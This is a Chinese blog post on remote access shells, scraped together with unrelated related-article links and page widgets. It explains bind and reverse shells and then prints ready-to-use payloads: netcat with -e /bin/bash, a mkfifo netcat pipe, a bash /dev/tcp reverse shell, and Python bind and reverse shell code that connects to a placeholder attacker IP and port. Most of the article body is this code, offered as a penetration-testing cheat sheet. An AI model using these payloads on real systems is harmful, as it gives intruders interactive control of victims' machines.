[1] 远程访问shell

已于 2024-10-09 13:10:01 修改
阅读量344 收藏 10
点赞数 5
分类专栏: 安全零散知识 文章标签: 网络 安全 tcp/ip
于 2024-09-26 00:59:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45776114/article/details/142535901
版权

文章目录

1. 简介

远程访问shell分为两种类型:

  • 反弹shell:反弹 shell 是指目标机器主动发起 TCP 连接,将其 shell 输出和输入反向传递到攻击者控制的远程机器上。即目标机器向攻击者的机器发起连接,从而允许攻击者控制目标系统。
    • 适用场景:
      1. 目标机器位于防火墙和NAT后面:外部无法直接访问目标机器的端口。
      2. 防火墙设置限制:目标机器防火墙限制端口开放、阻止外部连接进行连接情况。
      3. 目标机器权限受限:目标机器上可能无法打开监听端口(例如没有 root 权限),但可以通过反弹 shell 发起出站连接。
  • 正向shell: 正向 shell(bind shell)是指目标机器在特定端口上打开一个监听服务,攻击者可以通过连接这个端口获得 shell 控制。即目标机器监听端口,攻击者向该端口发起连接。
    • 适用场景:
      1. 目标机器允许监听端口,不处于防火墙或NAT后面
      2. 内网中横向移动:在内网渗透中,正向 shell 有时被用于从一台已被攻陷的机器(目标)向同一网络中的其他机器发起攻击,并获得 shell 访问。
      3. 攻击者的机器受到网络或防火墙限制: 如果攻击者的网络有严格的防火墙策略,不允许接收来自目标机器的连接,那么正向 shell 更加合适,因为攻击者可以主动连接到目标的监听端口。

2. 正向shell实现

2.1 NetCat

nc -lvp 4444 - e/bin/bash

命令解释:

  • lvp 4444: l 表示开启监听模式,v 显示详细信息, p 指定监听端口
  • -e /bin/bash: 指定连接建立,指定要执行的命令为/bin/bash,将shell提供给连接的攻击者。

2.2 python实现

一般Linux系统都会预装python环境。

python -c 'import socket,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.bind(("0.0.0.0", 4444)); s.listen(1); conn, addr = s.accept(); os.dup2(conn.fileno(),0); os.dup2(conn.fileno(),1); os.dup2(conn.fileno(),2); os.system("/bin/bash")'

2.3 利用: 攻击者机器进行连接

	nc ip port

3. 反向shell

3.1 利用: 攻击者机器开启监听,等待连接

# 主动等待连接
nc -lvp 4444

3.2 nc实现

nc -e /bin/sh 攻击者ip 攻击者port
# 如果nc不支持-e参数时
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 你的IP地址 端口号 > /tmp/f

命令解释:

  • -e /bin/bash:代表执行/bin/bash程序,并将命令的输入、输出、错误重定向到建立的网络连接。
  • ip, port: 指定要连接的目标地址。

3.3 bash实现

bash -i >& /dev/tcp/你的IP地址/端口号 0>&1

解释:

  • bash -i:启动bash并适用交互模式。这个模式下,bash将以一种能够与用户进行交互的方式运行。
  • >& /dev/tcp/你的IP地址/端口号: 通过/dev/tcp进行TCP连接,通过它用远程主机发起网络连接。这意味着所有输出都会发送到这个远程主机的指定端口。
  • 0>&1: 表示将标准输入(0 表示 stdin)重定向到标准输出(1 表示 stdout),使得来自远程主机的输入可以通过该连接进入目标机器的 bash shell。这相当于让远程主机的输入被目标机器的 shell 处理,从而实现远程命令执行。

3.4 python实现

# coding: utf-8
import socket
import subprocess
import os

# 攻击者的IP和端口
attacker_ip = '攻击者IP'
attacker_port = 攻击者端口

# 创建一个socket对象
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# 连接到攻击者的IP和端口
s.connect((attacker_ip, attacker_port))

# 重定向标准输入、输出和错误流到 socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)

# 启动一个交互式的 shell
subprocess.call(['/bin/sh', '-i'])
无限码力
关注
专栏目录
hbase shell远程连接_HBase 基础条件
weixin_39840111的博客
12-27 1769
在本文中,我们列出了使用HBase时所需要的服务和一些必需的系统配置。安装JavaJava是Hadoop和HBase主要先决条件。首先应该使用"java -verion"检查java是否存在在您的系统上。 java -version 命令的语法如下。如果一切正常,它会得到下面的输出。如果Java还没有安装在系统中,请你安装Java!HBase版本与JDK在下表中你可以看到HBase版本与其对应支持...
python远程执行shell脚本文件_Python远程linux执行命令
weixin_39649478的博客
11-29 1330
1、远程登录到linux上,使用到的模块paramiko#远程登陆操作系统def ssh(sys_ip,username,password,cmds):try#创建ssh客户端client = paramiko.SSHClient()#第一次ssh远程时会提示输入yes或者noclient.set_missing_host_key_policy(paramiko.AutoAddPolicy())#...
springboot 远程调用shell脚本,环境为windows
鳄鱼儿
05-09 1966
springboot 远程调用shell脚本,环境为windowspom.xml配置yml配置文件实体类配置服务器SSH 由于需要调用shell脚本实现一些自动化控制操作,特记录一下实现代码。 主要使用到Ganymed SSH-2 for Java包,是java实现SSH-2协议的一个包,利用它在Java程序中连接SSH服务器。 包地址:点我下载 maven仓库地址:点我打开 pom.xml配置 ...... <dependencies> <dependency&g
shell访问远程主机方法
胡子的博客
06-20 6518
1、传统ssh公私密钥授信,免密登录;    网上文档一堆,不罗嗦了2、expect交互登录#!/bin/expect  set timeout 30  spawn ssh -l jikuan.zjk 10.125.25.189  expect "password:"  send "zjk123\r"  interact  注意:expect跟bash类似,使用时要先登录到expect,所以首行要...
shell 远程连接服务器,shell脚本远程连接服务器并执行指定的shell脚本
weixin_32887779的博客
07-30 1380
shell脚本远程连接服务器并执行指定的shell脚本发布时间:2020-08-19 14:35:20来源:51CTO阅读:1585作者:素颜猪1.脚本名称demo.sh#!/bin/bashyum -y install expectexpect -c "spawn scp -r /Users/yunshuodeng/Work/mydocker/app/provider/power-dubbo-p...
RabbitMQ远程访问
皮特儿的博客
11-19 3571
guest这个用户只能使用localhost登录,而不能使用IP地址登录:远程无法连接可以建立一个新的用户,用于远程链接。
远程访问及控制
m0_73868728的博客
05-17 2112
SSH(Secure Shell)是一种安全通道协议,主要用来实现字符界面的远程登录、远程复制等功能。SSH协议对通信双方的数据传输进行了加密处理,其中包括用户登录时输入的用户口令。与早期的Telent(远程登录)、RSH(Remote Shell,远程执行命令)、RCP(Remote File Copy,远程文件复制)等应用相比,SSH协议提高了更好的安全性。
小坑远程shell工具
qq_40271389的博客
04-13 1189
小坑远程shell管理工具
Mac 终端连接远程服务器 shell 操作命令
失忆蝴蝶
08-26 1224
1、root权限操作 sudo -i 2、切换到root权限后,输入命令: ssh root@你的远程服务器的IP地址 ssh root@127.0.0.1 结果如下图: 回车后输入密码即可连接远程服务器shell,随后操作即可按照服务器的语法命令操作。 连接成功啦,如果疑问,欢迎留言~ ...
ubuntu开启远程访问
hllyzms的博客
11-12 3139
11月 07 15:44:15 hl sshd[5576]: pam_unix(sshd:session): session opened for user hlly by (uid=0)11月 07 15:44:16 hl sshd[5685]: pam_unix(sshd:session): session opened for user hlly by (uid=0)11月 07 15:42:09 hl sshd[5458]: Server listening on :: port 22.
linux远程访问工具secure shell client
08-02
SSH Secure Shell Client是一个用来替代TELNET、FTP以及R命令的数据加密工具,进行ssh 下载主要是想解决口令在网上明文传输的问题。为了系统安全和用户自身的权益,推广SSH是必要的。 SSH是英文Secure Shell的简写...
VBScript 打造自己的远程CMDShell附使用教程
09-05
《VBScript创建远程CMDShell详解及使用教程》 在网络安全领域,远程CMD...这种方法在系统管理、渗透测试或恶意攻击中都有应用,但请注意,任何未经授权的远程访问都可能触犯法律,因此在实际操作时必须确保合法性。
shell远程连接工具
08-11
2. **开发调试**:开发者可以远程部署和测试代码,尤其在分布式系统中,远程访问是必要的。 3. **协作办公**:团队成员可以共享远程服务器资源,协同工作,提高效率。 4. **教学演示**:教师或培训师可以使用...
Linux远程访问工具
06-08
在Linux环境中,常用的远程访问协议有SSH(Secure Shell)和FTP(File Transfer Protocol),分别用于命令行交互和文件传输。 Xshell是一款强大的终端模拟器,支持SSH、Telnet、Rlogin、Serial等多种协议,让用户...
如何用java程序(JSch)运行远程linux主机上的shell脚本
10-14
然后,确保远程Linux主机开启了SSH服务,并且你的Java程序具有访问该主机的权限。在远程主机上,你需要创建一个shell脚本来测试,例如`hello.sh`,内容如下: ```bash #!/bin/sh echo "hello $1\n"; ``` 确保脚本...
计算机网络的数据链路层
2301_81152393的博客
10-30 286
数据链路层的主要功能是在物理层提供的服务的基础上向网络层提供服务,其最基本的服务是将源自网络层来的数据可靠地传输到相邻节点的目标机网络层。数据链路层在现代计算机网络中扮演着重要角色,它确保了网络层以下的数据有效、可靠地在相邻节点之间传输。随着技术的发展,数据链路层也在不断演进,以支持更高速率、更低延迟和更强安全性的网络通信需求。数据链路层使用不同的方法将网络层的数据分组封装成帧,包括字符计数法、字符填充法、零比特填充法和违规编码法等。1.流量控制:控制发送方的数据发送速率,以匹配接收方的处理能力。
如何使用SOCKS5代理提升匿名性
dailiip1的博客
10-30 766
SOCKS5代理作为一种高效的网络匿名技术,能够为使用者提供多样化的应用场景和显著的隐私保护优势。透过正确配置和合理使用SOCKS5代理,使用者可以有效提升线上安全性,规避潜在的网络监控和攻击风险,享受更安全和自由的网络体验。未来随着网络安全需求的不断增长,SOCKS5代理技术的应用和发展将更加广泛和深入,为用户创造更安全可靠的网络环境。
tcp shutdown, fin_wait1, fin_wait2, close_wait, last_ack, 谢特!
最新发布
Netfilter
10-31 722
状态很奇怪,人们很难接受一个连接在非 ESTABLISHED 状态下正常传输数据,这会引来一堆咨询,但根据 TCP 状态机,这又是合理的,client 单向关闭了发送,FIN 就过去了,server 回复了 FIN,进入 CLOSE_WAIT,client 收到回复进入 FIN_WAIT_2,而 server 在 CLOSE_WAIT 下发数据,client 在 FIN_WAIT_2 下是完全合理的。但如果应用程序希望如此呢?TCP 的 RFC793 并未规定状态超时时间,为完整闭环这是合理的。
impala-shell 远程访问
09-12
要从远程访问 Impala-shell,你需要确保Impala服务器配置允许远程连接,并且网络设置允许你从客户端机器到Impala服务器的访问。 以下是使用impala-shell进行远程访问的一般步骤: 1. 确保Impala守护进程正在运行,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值